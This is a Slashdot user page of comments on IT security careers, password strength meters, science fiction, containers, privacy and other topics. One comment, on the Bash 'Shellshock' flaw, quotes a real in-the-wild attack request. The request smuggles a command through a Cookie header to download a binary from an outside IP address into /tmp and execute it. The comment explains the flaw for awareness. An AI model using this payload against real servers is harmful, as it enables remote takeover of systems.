Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror

+ - What is keeping you out of IT Security?

Submitted by xanthos
xanthos writes: Demand for cybersecurity professionals over the past five years grew 3.5 times faster than demand for other IT jobs and about 12 times faster than for all other jobs, according to a March 2014 report by Burning Glass Technologies.

The types of jobs in the field are numerous and range from entry level analysts who monitor intrusion detection systems, security engineers and architects who design and build out various security technologies, risk and compliance analysts, pen testers, malware reversal analysts and IT Security management.

With all these jobs paying above average and many over $100K, what is keeping you from taking your admin, networking, developer experience and moving to information security?

Comment: And the point of the study is what? (Score 1) 159

by xanthos (#49346719) Attached to: Many Password Strength Meters Are Downright Weak, Researchers Say

Single factor authentication (ie password) is a people problem. If access to a site is granted by matching an identifier with one other piece of information, then it is the risk created by the compromise of those credentials that should govern how "strong" those credentials need to be.

Financial information? Strong. Personal Health information? Strong. Email? Depends on how interesting you are. Hardware store loyalty points? Meh.

The more important point from the article is this:
"In fact, research from Microsoft/University of California at Berkeley/University of British Columbia (paper titled Does My Password Go Up to Eleven? The Impact of Password Meters on Password Selection) found that indeed, password gauges do encourage users to concoct stronger passwords."

Warn/shame people that their passwords suck and they are likely to do better.

(And interestingly enough, mathematically a site that insists on an 8 character password with at least one each of upper/lower case letters, numbers and special characters produces less secure passwords than a site that insists on 8 characters that can be any of those.)

Comment: And if you haven't read Simak (Score 4, Informative) 104

by xanthos (#49234911) Attached to: Some of the Greatest Science Fiction Novels Are Fix-Ups

If you are unfamiliar with the work of Clifford Simak I strongly suggest that you give him a try. What I have always loved is that there is so much that is just unknown going on in his stories. No great hero's, no great battles, just a lot of "what the hell is going on here?"

His last book "Highway of Eternity" is great and "Ring around the Sun" has always been a favorite as well. Most of his stuff is a short quick read abd us easily found in your favorite used book store (you do have one I hope).

At a minimum read the novel synopsis over at Wikipedia to get a glimpse of a very interesting author.

Comment: A number of free options at Turnkey Linux (Score 1) 343

by xanthos (#49075301) Attached to: Ask Slashdot: Version Control For Non-Developers?

A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or plone and see if they fit the need or not. Then if there is something they like they can load the iso on a bare metal box and go.

Comment: On the Internet, no one knows that you are a dog (Score 1) 62

by xanthos (#48757133) Attached to: CES 2015: FTC Head Warns About Data Grabbed By Smart Gadgets

Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.

Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Issac scoring formula, have claimed for years that those numbers offer a glimpse into a persons soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.

There are a bunch of people who think they can make a fortune collecting other peoples data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.

Comment: Have we come full circle? (Score 1) 71

by xanthos (#48508737) Attached to: CoreOS Announces Competitor To Docker

I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable was redundant with each other. Hence static executables were superceded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to dll version hell. So now we have containers which allows an application to be bundled up with just the code it needs to execute.

And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.

I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.

Comment: Beware of the Dark Side! (Score 1) 320

by xanthos (#48371391) Attached to: Duke: No Mercy For CS 201 Cheaters Who Don't Turn Selves In By Wednesday

Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.

In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.

There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.

In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".

Comment: So the REAL problem is ... (Score 1) 429

by xanthos (#48113679) Attached to: BitHammer, the BitTorrent Banhammer

1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job

There is a reason I've used this sig for years.

Comment: Will there be roundabouts? (Score 1) 86

by xanthos (#48084699) Attached to: Michigan Builds Driverless Town For Testing Autonomous Cars

I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.

While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?

Comment: Yes it is being exploited (Score 5, Informative) 318

by xanthos (#47996085) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

Computers are unreliable, but humans are even more unreliable. Any system which depends on human reliability is unreliable. -- Gilb

Working...